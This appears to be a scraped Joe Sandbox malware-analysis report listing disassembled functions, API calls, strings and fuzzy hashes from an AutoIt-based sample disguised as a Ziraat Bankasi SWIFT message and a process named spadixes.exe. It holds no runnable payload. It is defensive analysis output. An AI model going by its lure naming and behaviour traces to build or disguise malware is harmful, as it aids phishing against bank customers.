Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9dc4e273c073b5d7c1113bf65c661c3e4780a3ab7588854e1ec70e3c2e9543b9
Instruction ID: ef9342882e158a3c82231a7c5532e8116f6af167c77e68a7f95dbc8d89d278dd
Opcode Fuzzy Hash: 9dc4e273c073b5d7c1113bf65c661c3e4780a3ab7588854e1ec70e3c2e9543b9
Instruction Fuzzy Hash: 3411E27EA01654ABDB60DB98DD04F9D77F8AB46791F040029E942E72E0D3B0FE84CB90

Function 000D4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000D4DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000D4E1E

Strings

<local>, xrefs: 000D4DE6

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d7ac0b447ddd6b205dc2cff1fde52bdf307b1ac7453cc41e90352aefc505245b
Instruction ID: b8f3be26a908a57e169498b49c95dccfa5e0418176b10267b83bfb36b39db1ec
Opcode Fuzzy Hash: d7ac0b447ddd6b205dc2cff1fde52bdf307b1ac7453cc41e90352aefc505245b
Instruction Fuzzy Hash: D0117C70501321BBDB258FA1C889EFBFBA9FF16755F10822BF55696640D3B05984C6F0

Function 000D65D2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 000D6608

Strings

AUTOITCALLVARIABLE%d, xrefs: 000D65FA
, $, xrefs: 000D6648

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 6f0ab0fae1cda57b4d70dd228d885c90497eda6a8dde1b431776bcfddf806bfe
Instruction ID: 17df98b572711d038614ed19de27807fcdc26dbaa4b5849fadde3ad8688ca42c
Opcode Fuzzy Hash: 6f0ab0fae1cda57b4d70dd228d885c90497eda6a8dde1b431776bcfddf806bfe
Instruction Fuzzy Hash: 08119A32600628AACF11FF90DC82FEE7375BF55740F44006AF545AB283DB75EA458BA9

Function 000DA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000), ref: 000DA84E
htons.WSOCK32(00000000), ref: 000DA88B

Strings

255.255.255.255, xrefs: 000DA866

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 91139a81233e6b9f6231ab158e12c27774244eea64df2255d02ff180886360f5
Instruction ID: 7a65a9487a9f36222dde6ad6e59a45376137c7a6eb23e8be0173c86270367326
Opcode Fuzzy Hash: 91139a81233e6b9f6231ab158e12c27774244eea64df2255d02ff180886360f5
Instruction Fuzzy Hash: C801D675300304ABDB21AFA4D856FEEB3A4EF45314F10842BF915A73D2DB71E8019766

Function 000BB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000BB7EF

Strings

ListBox, xrefs: 000BB7B9
ComboBox, xrefs: 000BB78B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: dd8b14d952ac0b3b3a41e667ff9660ab9842ba1dc1e26333bd5b5347a4567b22
Instruction ID: 98a60b8a421869ff4947188afca38c197f2a6441715218e565f15f4efdc4c2e3
Opcode Fuzzy Hash: dd8b14d952ac0b3b3a41e667ff9660ab9842ba1dc1e26333bd5b5347a4567b22
Instruction Fuzzy Hash: 1D01DF75640118ABDB14FBA4CC52DFE73B9BF46350B04061EF4A2A72D2EFB05908CBA0

Function 000BB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 000BB6EB

Strings

ListBox, xrefs: 000BB6B5
ComboBox, xrefs: 000BB687

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 33c0bb15c980b923fe8fd9a67549a876e929592968120813b2c07051a3b813f5
Instruction ID: e5a49fa948c5d1d85e80523f94c8477e4095f948bf8398e064651b57c114d426
Opcode Fuzzy Hash: 33c0bb15c980b923fe8fd9a67549a876e929592968120813b2c07051a3b813f5
Instruction Fuzzy Hash: 73016D75641108ABDB14FBA4D953EFE73B8AF05344F14002AB542B3292EBA49E1897B5

Function 000BB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 000BB76C

Strings

ListBox, xrefs: 000BB738
ComboBox, xrefs: 000BB70A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 1e3fbdff4c81d0e0398395a282cea2f6279b208bef7637ebc9c15c833f457409
Instruction ID: 18a260a9501a65aee4cd92e03190f584c5beaca7fb611b2a0c22c7438b19e15f
Opcode Fuzzy Hash: 1e3fbdff4c81d0e0398395a282cea2f6279b208bef7637ebc9c15c833f457409
Instruction Fuzzy Hash: 6701AD75680104ABDB10FBA4D902EFE73ECAF05344F14001AB442B3292EFB05E0987B5

Function 000C7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 000C7762
_wcscmp.LIBCMT ref: 000C7774

Strings

#32770, xrefs: 000C776E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: d6cbe667146079d32a850442af03170c1660fc3ab8bc2c06ca0ec9a92bae1fd2
Instruction ID: b856e5fc049ea7eae3c4d7ac830043b4b8b35e00cd26ff026196121a49a86ee0
Opcode Fuzzy Hash: d6cbe667146079d32a850442af03170c1660fc3ab8bc2c06ca0ec9a92bae1fd2
Instruction Fuzzy Hash: CEE092B7A042286BD710ABE5EC0AECBFBACAB55764F00011AB915E3081D660A74187D4

Function 000CAC35 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27timeCOMMON

Download Yara Rule

APIs

VariantTimeToSystemTime.OLEAUT32 ref: 000CAC40
__swprintf.LIBCMT ref: 000CAC70

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 000CAC6A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Time$SystemVariant__swprintf
String ID: %4d%02d%02d%02d%02d%02d
API String ID: 3499402700-1568723262
Opcode ID: 5851db94fea2c0d6006fa599198590250f26100490abaee83f33d22808fe6134
Instruction ID: 6512f993bb9f0b85209edf539d9e8599682d17afbcc3b95cbafaebe390232883
Opcode Fuzzy Hash: 5851db94fea2c0d6006fa599198590250f26100490abaee83f33d22808fe6134
Instruction Fuzzy Hash: 42F0AC92900228A9CF64ABD98C45EFEB7FCAB0D701F014456F985E1082E63CDD80D735

Function 000BA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000BA63F

Part of subcall function 000A13F1: _doexit.LIBCMT ref: 000A13FB

Strings

Error allocating memory., xrefs: 000BA638
AutoIt, xrefs: 000BA633

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 2d23e5cf62b3bf1488d81d2c0376dd985b106ed1b8c89da8ede886efd1e2277d
Instruction ID: 0310d4931c524660823bc1d9b52d02060c464a59cfc94a2e61c8ee0cd8fdec87
Opcode Fuzzy Hash: 2d23e5cf62b3bf1488d81d2c0376dd985b106ed1b8c89da8ede886efd1e2277d
Instruction Fuzzy Hash: 5DD05B323C472833D61436D87C17FD576489B16B55F044065FB48955C34EE3968052D9

Analysis Process: spadixes.exePID: 720, Parent PID: 4812COMMON

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	0%
Total number of Nodes:	1521
Total number of Limit Nodes:	59

Executed Functions

Function 008EB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 978f36e9f7692232c95d2ae74eabf6bc1990aa34c718bc2635601a528e3270af
Instruction ID: ab47a111a730d5958d9a3ac3fcb6092f4b8d5dd99abbbe0fbc9821f4fdaaca96
Opcode Fuzzy Hash: 978f36e9f7692232c95d2ae74eabf6bc1990aa34c718bc2635601a528e3270af
Instruction Fuzzy Hash: 1A325D75B122688BDB248F19DC816EAB7B5FF47314F1841E9E40AE7A91D7309E80CF52

Function 00906CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00932F49), ref: 00906CB9
FindFirstFileW.KERNEL32(?,?), ref: 00906CCA
FindClose.KERNEL32(00000000), ref: 00906CDA

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: ef0e11e9d37231566a6094a29f45fd376752a46a11b36cdda678b08ff14022e8
Instruction ID: c3a4b9c878c0384332912052eff898e856dbdf7044a79f895596eda7cfc3c687
Opcode Fuzzy Hash: ef0e11e9d37231566a6094a29f45fd376752a46a11b36cdda678b08ff14022e8
Instruction Fuzzy Hash: 72E0D8398294209BD2186738EC0D8E937ACDA0A339F100709FAF1C11D0E770E91056D5

Function 008F5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 008F5EC3
___createFile.LIBCMT ref: 008F5F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 008F5F2D
__dosmaperr.LIBCMT ref: 008F5F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 008F5F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 008F5F6A
__dosmaperr.LIBCMT ref: 008F5F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 008F5F7C
__set_osfhnd.LIBCMT ref: 008F5FAC
__lseeki64_nolock.LIBCMT ref: 008F6016
__close_nolock.LIBCMT ref: 008F603C
__chsize_nolock.LIBCMT ref: 008F606C
__lseeki64_nolock.LIBCMT ref: 008F607E
__lseeki64_nolock.LIBCMT ref: 008F6176
__lseeki64_nolock.LIBCMT ref: 008F618B
__close_nolock.LIBCMT ref: 008F61EB

Part of subcall function 008EEA9C: CloseHandle.KERNELBASE(00000000,0096EEF4,00000000,?,008F6041,0096EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008EEAEC
Part of subcall function 008EEA9C: GetLastError.KERNEL32(?,008F6041,0096EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008EEAF6
Part of subcall function 008EEA9C: __free_osfhnd.LIBCMT ref: 008EEB03
Part of subcall function 008EEA9C: __dosmaperr.LIBCMT ref: 008EEB25

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

__lseeki64_nolock.LIBCMT ref: 008F620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 008F6342
___createFile.LIBCMT ref: 008F6361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008F636E
__dosmaperr.LIBCMT ref: 008F6375
__free_osfhnd.LIBCMT ref: 008F6395
__invoke_watson.LIBCMT ref: 008F63C3
__wsopen_helper.LIBCMT ref: 008F63DD

Strings

@, xrefs: 008F5F98

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: b390181eede2d66df72b8ed5a63229f524dc5f4ee06bd8ca163bb732a5652191
Instruction ID: e12eeb7f0e5a57bdc35d2f934b4f9e86df024a7053145e4d79226f2b19492343
Opcode Fuzzy Hash: b390181eede2d66df72b8ed5a63229f524dc5f4ee06bd8ca163bb732a5652191
Instruction Fuzzy Hash: 3B22367190460E9BEB299F78CC45BBD7B61FB41324F284228E721EB2E2E7358D60D751

Function 0090FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0090FA96
_wcschr.LIBCMT ref: 0090FAA4
_wcscpy.LIBCMT ref: 0090FABB
_wcscat.LIBCMT ref: 0090FACA
_wcscat.LIBCMT ref: 0090FAE8
_wcscpy.LIBCMT ref: 0090FB09
__wsplitpath.LIBCMT ref: 0090FBE6
_wcscpy.LIBCMT ref: 0090FC0B
_wcscpy.LIBCMT ref: 0090FC1D
_wcscpy.LIBCMT ref: 0090FC32
_wcscat.LIBCMT ref: 0090FC47
_wcscat.LIBCMT ref: 0090FC59
_wcscat.LIBCMT ref: 0090FC6E

Part of subcall function 0090BFA4: _wcscmp.LIBCMT ref: 0090C03E
Part of subcall function 0090BFA4: __wsplitpath.LIBCMT ref: 0090C083
Part of subcall function 0090BFA4: _wcscpy.LIBCMT ref: 0090C096
Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0A9
Part of subcall function 0090BFA4: __wsplitpath.LIBCMT ref: 0090C0CE
Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0E4
Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0090FA61

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 5c807a655878618738ab63b09989ea0ab72e36e40be4a42fd793ef120ef699a6
Instruction ID: 08855314d98d7c4067c0dac7d753000ffeb0c2e3c47ed51f7a1bb8d6e8284e60
Opcode Fuzzy Hash: 5c807a655878618738ab63b09989ea0ab72e36e40be4a42fd793ef120ef699a6
Instruction Fuzzy Hash: 1A91A272504345AFDB20EB58C851F9AB3E8FF84310F04896DF999D7292DB74EA44CB92

Function 008CE8B0 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 407
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CE959
timeGetTime.WINMM ref: 008CEBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CED2E
TranslateMessage.USER32(?), ref: 008CED3F
DispatchMessageW.USER32(?), ref: 008CED4A

Strings

@GUI_WINHANDLE, xrefs: 00935360
@GUI_CTRLHANDLE, xrefs: 009353AC
@GUI_CTRLID, xrefs: 00935314

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Message$Peek$DispatchTimeTranslatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
API String ID: 3210251501-758534266
Opcode ID: 54c7dff12753a94b62f12e97130040d06c55d64a0934e5ae6a10513d915e4bfc
Instruction ID: 4f5da2e5c930598bdd15fb3fd12569995337aae71edf77eb52611ef396ac5d4f
Opcode Fuzzy Hash: 54c7dff12753a94b62f12e97130040d06c55d64a0934e5ae6a10513d915e4bfc
Instruction Fuzzy Hash: 79F1AF705183809FEB24DF64C885FAA77E8FB55304F18096DE986CB292D7B4D889CB52

Function 008C3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008C3F86
RegisterClassExW.USER32(00000030), ref: 008C3FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C3FC1
InitCommonControlsEx.COMCTL32(?), ref: 008C3FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C3FEE
LoadIconW.USER32(000000A9), ref: 008C4004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C4013

Strings

+, xrefs: 008C3F6F
0, xrefs: 008C3F68
AutoIt v3 GUI, xrefs: 008C3FA2
TaskbarCreated, xrefs: 008C3FB6

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5f9e1ef8fd216a64e6853421f9391e2229b80c0a8fe9650e698b6eda024b31b3
Instruction ID: 1a7ea323a10b07a66e7dab7f5d95b836ad9a3f92deb1a3b0efe7dac38d513a6a
Opcode Fuzzy Hash: 5f9e1ef8fd216a64e6853421f9391e2229b80c0a8fe9650e698b6eda024b31b3
Instruction Fuzzy Hash: F821F7B9D25318AFDB00DFA4EC89BCDBBB8FB09700F00421AF611A63A0D7B50545AF90

Function 0090BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0090BDB4: __time64.LIBCMT ref: 0090BDBE

Part of subcall function 008C4517: _fseek.LIBCMT ref: 008C452F

__wsplitpath.LIBCMT ref: 0090C083
_wcscpy.LIBCMT ref: 0090C096
_wcscat.LIBCMT ref: 0090C0A9
__wsplitpath.LIBCMT ref: 0090C0CE
_wcscat.LIBCMT ref: 0090C0E4
_wcscat.LIBCMT ref: 0090C0F7
_wcscmp.LIBCMT ref: 0090C03E

Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C65D
Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0090C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0090C338
